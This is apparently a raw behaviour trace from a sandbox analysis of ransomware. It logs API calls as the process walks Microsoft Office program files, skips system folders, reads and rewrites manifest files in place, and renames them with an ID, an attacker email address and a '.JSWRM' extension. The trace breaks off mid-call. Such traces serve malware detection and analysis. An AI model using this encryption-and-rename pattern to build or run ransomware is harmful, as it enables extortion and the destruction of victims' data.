[0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 26 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.249] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45d3b76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf5ed8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVManifest.dll", cAlternateFileName="APPVMA~1.DLL")) returned 1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2=".") returned 1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="..") returned 1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="...") returned 1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="windows") returned -1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="recovery") returned -1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="perflogs") returned -1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="documents and settings") returned -1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="system volume information") returned -1 [0101.249] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="msocache") returned -1 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVManifest.dll", lpUsedDefaultChar=0x0) returned 16 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0101.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVManifest.dll", lpUsedDefaultChar=0x0) returned 16 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0101.249] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6cde4ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6cde4ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bf6d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVOpcServices.dll", cAlternateFileName="APPVOP~1.DLL")) returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2=".") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="..") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="...") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="windows") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="recovery") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="perflogs") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="documents and settings") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="system volume information") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll", lpString2="msocache") returned -1 [0101.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0101.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOpcServices.dll", lpUsedDefaultChar=0x0) returned 19 [0101.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOpcServices.dll", lpUsedDefaultChar=0x0) returned 19 [0101.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0101.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0101.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0101.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0101.250] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf466c4e5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf466c4e5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4692737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x221, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVOpcServices.dll.manifest", cAlternateFileName="APPVOP~1.MAN")) returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2=".") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="..") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="...") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="windows") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="recovery") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="perflogs") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="documents and settings") returned -1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="$RECYCLE.BIN") returned 1 [0101.250] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="system volume information") returned -1 [0101.251] lstrcmpiW (lpString1="AppVOpcServices.dll.manifest", lpString2="msocache") returned -1 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll.manifest", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll.manifest", cchWideChar=28, lpMultiByteStr=0x240ef8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOpcServices.dll.manifest", lpUsedDefaultChar=0x0) returned 28 [0101.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll.manifest", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOpcServices.dll.manifest", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOpcServices.dll.manifest", lpUsedDefaultChar=0x0) returned 28 [0101.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0101.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0101.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll.manifest" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.253] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=545) returned 1 [0101.253] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x220) returned 0x209950 [0101.253] ReadFile (in: hFile=0x45c, lpBuffer=0x209950, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345ec04*=0x220, lpOverlapped=0x0) returned 1 [0101.254] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.254] WriteFile (in: hFile=0x45c, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345ec00*=0x220, lpOverlapped=0x0) returned 1 [0101.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209950 | out: hHeap=0x1e0000) returned 1 [0101.254] CloseHandle (hObject=0x45c) returned 1 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0101.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0101.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0101.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0101.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0101.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll.manifest" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVOpcServices.dll.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvopcservices.dll.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0101.264] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f4ff2d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f4ff2d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11541b08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d2d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVPackaging.dll", cAlternateFileName="APPVPA~1.DLL")) returned 1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2=".") returned 1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="..") returned 1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="...") returned 1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="windows") returned -1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="recovery") returned -1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="perflogs") returned -1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="documents and settings") returned -1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="system volume information") returned -1 [0101.264] lstrcmpiW (lpString1="AppVPackaging.dll", lpString2="msocache") returned -1 [0101.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0101.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPackaging.dll", lpUsedDefaultChar=0x0) returned 17 [0101.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPackaging.dll", lpUsedDefaultChar=0x0) returned 17 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0101.265] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVPackaging.dll.manifest", cAlternateFileName="APPVPA~1.MAN")) returned 1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2=".") returned 1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="..") returned 1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="...") returned 1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="windows") returned -1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="recovery") returned -1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="perflogs") returned -1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="documents and settings") returned -1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="$RECYCLE.BIN") returned 1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="system volume information") returned -1 [0101.265] lstrcmpiW (lpString1="AppVPackaging.dll.manifest", lpString2="msocache") returned -1 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll.manifest", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll.manifest", cchWideChar=26, lpMultiByteStr=0x241010, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPackaging.dll.manifest", lpUsedDefaultChar=0x0) returned 26 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll.manifest", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVPackaging.dll.manifest", cchWideChar=26, lpMultiByteStr=0x241380, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVPackaging.dll.manifest", lpUsedDefaultChar=0x0) returned 26 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0101.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0101.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Flattener\\AppVPackaging.dll.manifest" (normalized: "c:\\program files\\microsoft office\\root\\flattener\\appvpackaging.dll.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.266] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=707) returned 1 [0101.266] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c0) returned 0x20b1f8 [0101.267] ReadFile (in: hFile=0x45c, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345ec04*=0x2c0, lpOverlapped=0x0) returned 1 [0101.268] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.268] WriteFile (in: hFile=0x45c, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345ec00*=0x2c0, lpOverlapped=0x0) returned 1 [0101.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0101.268] CloseHandle (hObject=0x45c) returned 1 [0101.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0101.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 